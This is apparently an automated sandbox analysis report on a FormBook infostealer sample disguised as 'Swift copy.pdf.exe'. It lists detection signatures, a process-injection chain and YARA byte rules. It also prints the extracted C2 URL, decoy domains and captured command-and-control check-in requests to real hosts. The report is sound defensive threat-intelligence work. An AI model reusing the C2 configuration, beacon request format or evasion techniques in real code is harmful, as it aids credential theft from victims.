Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Swift copy.pdf.exe

Overview

General Information

Sample Name:Swift copy.pdf.exe
Analysis ID:385261
MD5:5946d0ee4becb515a1cf39ef3f3dde56
SHA1:3321193ab8c09ab1098d8104afd021145eca89c3
SHA256:2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Swift copy.pdf.exe (PID: 6628 cmdline: 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6896 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6904 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • cscript.exe (PID: 6180 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6248 cmdline: /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wapgoals.com/ifne/"], "decoy": ["science1230.com", "louiesluncheonette.com", "radsum.info", "ziscogore.com", "smlet.com", "bbasgroup.com", "trailyerlife.com", "sparklingtheworld.com", "rileysboutique.com", "weightneutralmetflex.com", "haznegocioconnosotros.com", "hfuu.net", "tdfsz.com", "buymy1sthome.com", "karmicreaction.com", "yy111.xyz", "bkajaxkja.com", "midtownbuilder.com", "stepmed.life", "alkeses.com", "xstreamagile.com", "prostroyka.com", "xisiman1688.com", "eyelashextensionssanantonio.com", "arrowinsightshunter.com", "lehoachi.com", "rasodemeinkauntha.com", "columbiaprobateattorney.com", "ashleypeckich.com", "thevintagemarque.com", "lorofineart.com", "wearegrowthhackerz.com", "abramstrucking.net", "technomark.xyz", "cursalee.com", "ultimatecatnutrtion.com", "fundamentalflavors.com", "jamaicanallstars.net", "africanosworld.com", "maskfinland.com", "modkit.design", "xuannghiaduong.com", "indiafoodtraveling.com", "towhonoatelecilasyah.site", "agenciaorange.net", "shelterlaapparel.com", "criticalredux.com", "srl-4.com", "bioclear.energy", "mytransactionkeeper.com", "elektroliquid.com", "brabrains.com", "melodylandrum.com", "felipestephan.com", "rosemancreations.com", "lithoprints.art", "ulsanteam.com", "datingliste.online", "solitairenola.com", "kuppers.info", "burningpeel.com", "myscottdalechiropractor.com", "greenzebranetworks.com", "marktheoilguy.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Swift copy.pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Swift copy.pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Swift copy.pdf.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        5.2.Swift copy.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.Swift copy.pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.wapgoals.com/ifne/"], "decoy": ["science1230.com", "louiesluncheonette.com", "radsum.info", "ziscogore.com", "smlet.com", "bbasgroup.com", "trailyerlife.com", "sparklingtheworld.com", "rileysboutique.com", "weightneutralmetflex.com", "haznegocioconnosotros.com", "hfuu.net", "tdfsz.com", "buymy1sthome.com", "karmicreaction.com", "yy111.xyz", "bkajaxkja.com", "midtownbuilder.com", "stepmed.life", "alkeses.com", "xstreamagile.com", "prostroyka.com", "xisiman1688.com", "eyelashextensionssanantonio.com", "arrowinsightshunter.com", "lehoachi.com", "rasodemeinkauntha.com", "columbiaprobateattorney.com", "ashleypeckich.com", "thevintagemarque.com", "lorofineart.com", "wearegrowthhackerz.com", "abramstrucking.net", "technomark.xyz", "cursalee.com", "ultimatecatnutrtion.com", "fundamentalflavors.com", "jamaicanallstars.net", "africanosworld.com", "maskfinland.com", "modkit.design", "xuannghiaduong.com", "indiafoodtraveling.com", "towhonoatelecilasyah.site", "agenciaorange.net", "shelterlaapparel.com", "criticalredux.com", "srl-4.com", "bioclear.energy", "mytransactionkeeper.com", "elektroliquid.com", "brabrains.com", "melodylandrum.com", "felipestephan.com", "rosemancreations.com", "lithoprints.art", "ulsanteam.com", "datingliste.online", "solitairenola.com", "kuppers.info", "burningpeel.com", "myscottdalechiropractor.com", "greenzebranetworks.com", "marktheoilguy.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Swift copy.pdf.exeVirustotal: Detection: 30%Perma Link
          Source: Swift copy.pdf.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Swift copy.pdf.exeJoe Sandbox ML: detected
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Swift copy.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Swift copy.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_025865C8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02587338
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02587337
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_025865B7

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.wapgoals.com/ifne/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.technomark.xyz
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.wapgoals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.criticalredux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.rileysboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.agenciaorange.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.technomark.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.indiafoodtraveling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
          Source: Joe Sandbox ViewASN Name: IHNETUS IHNETUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.wapgoals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.criticalredux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.rileysboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.agenciaorange.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.technomark.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.indiafoodtraveling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.wapgoals.com
          Source: Swift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: Swift copy.pdf.exe, 00000000.00000002.351601216.0000000002791000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Swift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlv
          Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comL
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma-d
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comdjq
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.n
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coms
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comu
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmll
          Source: Swift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
